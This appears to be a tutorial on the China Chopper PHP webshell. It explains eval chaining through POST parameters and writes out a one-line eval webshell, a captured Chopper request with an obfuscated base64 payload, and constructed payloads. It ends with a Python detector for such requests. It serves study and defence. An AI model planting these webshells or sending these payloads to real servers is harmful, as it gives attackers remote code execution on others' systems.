Let's start with an example of eval.
We know that eval in PHP executes a string as code:
eval('phpcode');
Note that the code passed in must end with a semicolon. Let's test this.
We create the simplest possible shell:
<?php eval($_POST['a']);
and send this as the POST data:
a=phpinfo()
You can see that phpinfo() is not executed.
The reason is that a semicolon is needed to terminate the statement: just as in ordinary PHP syntax, every statement must be followed by a semicolon.
Another point here: the input a=phpinfo(); does not need to be wrapped in single or double quotes.
Back to eval. Let's add several layers of eval and see what happens:
<?php eval(eval(eval($_POST['a'])));
The effect is the same.
Now we create a simple webshell, open a packet-capture tool and capture the packet Chopper sends. The request looks like this:
POST /2.php HTTP/1.1
Cache-Control: no-Cache
X-Forwarded-For: 226.60.187.9
Referer: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: localhost
Content-Length: 738
Connection: Close

a=%40Eval%01%28Base64_decode%28%24_post%5bz0%5d%29%29%3b&z0= Qgluav9zzxqoimrpc3bsyxlfzxjyb3jziiwimcipo0bzzxrfdgltzv9saw1pdcgwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oii0 %2bfcipozskrd1iyxnlnjrfzgvjb2rlkcrfue9tvfsiejeixsk7jey9qg9wzw5kaxiojeqpo2lmkcrgpt1ovuxmkxtly2hvkcjfuljpujovlybqyxroie5vdc Bgb3vuzcbpcibobybqzxjtaxnzaw9uisipo31lbhnleyrnpu5vtew7jew9tlvmtdt3aglszsgktj1acmvhzgrpcigkrikpeyrqpsreliivii4ktjskvd1azgf 0zsgiws1tlwqgsdpponmilebmawxlbxrpbwuojfapkttajeu9c3vic3rykgjhc2vfy29udmvydchazmlszxblcm1zkcrqkswxmcw4kswtnck7jfi9ilx0ii4k Vc4ixhqilkbmawxlc2l6zsgkuckuilx0ii4krs4icii7awyoqglzx2rpcigkuckpje0upsroliivii4kujtlbhnlicrmlj0kti4kujt9zwnobyakts4ktdtay 2xvc2vkaxiojeypo307zwnobygifdwtiik7zgllkck7&z1=rdpcxhbocfn0dwr5xfxxv1dcxa%3d%3d
Just looking at this POST packet, even without base64-decoding anything, it is obvious that Chopper places another chunk of POST data (in z0) and feeds it back through parameter a.
So we can see that the packet Chopper sends works roughly like this:
<?php eval($_POST['a']);
# POST:
# $_POST['a'] = another piece of POST data
# $_POST['a'] = $_POST['b']
# i.e. what is sent in is $_POST['a'] = $_POST['b'] = b
In other words, when we send a request we can construct it like this:
a=$_POST[b]&b=phpinfo
This is equivalent to:
a=phpinfo
Remember what we said above: add a semicolon, and no single or double quotes:
a=$_POST[b];&b=phpinfo()
This data is equivalent to:
a=phpinfo();  # $_POST[b] is replaced by phpinfo()
Let's test the effect.
As you can see, the phpinfo() function is not executed.
Why?
A small example illustrates the reason:
<?php echo 'post[a]: ' . $_POST['a'] . "<br/>"; echo 'post[b]: ' . $_POST['b'];
After sending the data, the output looks like this:
As you can see, the value of a is $_POST[b]; but this $_POST[b]; is just a plain string, and that string is not interpreted as PHP code.
It is the equivalent of writing code like this:
<?php '$_POST[b]';
Such a parameter will of course fail; it is as if you had written code like this:
eval('ABCDEFG');
eval requires a string in the form of PHP code, so the following is legal:
eval('echo "ABCDEFG";');
Finally, we can construct code like this:
eval('eval($_POST[b]);');
This lets the phpinfo function run normally.
Adding eval into the data we send:
One thing to note: the PHP code in $_POST[b] must end with a semicolon, because it is consumed by the eval in $_POST[a]; and the PHP code in $_POST[a] must also end with a semicolon, because it is consumed by the eval in the source code.
In the $_POST[a] position we can also send base64-encoded data, so that the $_POST[b] data is passed through cleanly:
In summary, the purpose of the eval in POST parameter a is to interpret its value, $_POST[b].
In fact, we can use just a single parameter a in the data we send:
<?php eval($_POST['a']);
After receiving it, the shell can decode it however we choose (if the data is encoded):
<?php eval(base64_decode($_POST['a']));
# POST:
# a=cGhwaW5mbygpOw==   (base64 of "phpinfo();")
That is how the Java version of Chopper, Cknife, works.
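As an added example (not code from the original post), here is a small Python check a defender can run over captured POST bodies to spot the two things shown above: one parameter that evals a reference to another parameter, and a parameter that is itself base64 of PHP code (the z0 style). The sample bodies are constructed to mirror the requests discussed, and the flag names are my own.

```python
import base64
import re
from urllib.parse import parse_qsl

# Patterns for the eval chaining described above. Chopper puts a control
# byte between "eval" and "(" (the %01 in the captured request), so control
# characters are stripped before matching.
EVAL_RE = re.compile(r'\beval\s*\(', re.IGNORECASE)
B64_RE = re.compile(r'\bbase64_decode\s*\(', re.IGNORECASE)
POST_REF_RE = re.compile(r'\$_POST\s*\[', re.IGNORECASE)
PHP_CALL_RE = re.compile(r'<\?php|\b\w+\s*\(', re.IGNORECASE)
CONTROL_RE = re.compile(r'[\x00-\x08\x0b\x0c\x0e-\x1f]')

def decode_b64_param(value: str) -> str:
    """Best-effort base64 decode of one parameter; '' if it is not base64."""
    padded = value + '=' * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode('latin-1')
    except ValueError:  # binascii.Error is a subclass of ValueError
        return ''

def score_body(body: str) -> dict:
    """Map each suspicious POST parameter to the reasons it was flagged."""
    flagged = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        text = CONTROL_RE.sub('', value)
        reasons = []
        if EVAL_RE.search(text):
            reasons.append('eval')
        if B64_RE.search(text):
            reasons.append('base64_decode')
        if POST_REF_RE.search(text):
            reasons.append('post-chain')
        # A parameter that is itself base64 and decodes to PHP-looking code
        # is the z0-style payload seen in the captured request.
        if not reasons and PHP_CALL_RE.search(decode_b64_param(text)):
            reasons.append('base64-payload')
        if reasons:
            flagged[name] = reasons
    return flagged

# Constructed sample bodies modelled on the requests discussed in the text.
SAMPLE_CHAIN = 'a=%24_POST%5Bb%5D%3B&b=phpinfo%28%29%3B'
SAMPLE_CHOPPER = ('a=%40Eval%01%28Base64_decode%28%24_post%5Bz0%5D%29%29%3B'
                  '&z0=cGhwaW5mbygpOw%3D%3D')
SAMPLE_BENIGN = 'user=alice&comment=hello+world'

if __name__ == '__main__':
    for sample in (SAMPLE_CHAIN, SAMPLE_CHOPPER, SAMPLE_BENIGN):
        print(score_body(sample))
```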
PHP Chopper Analysis Learning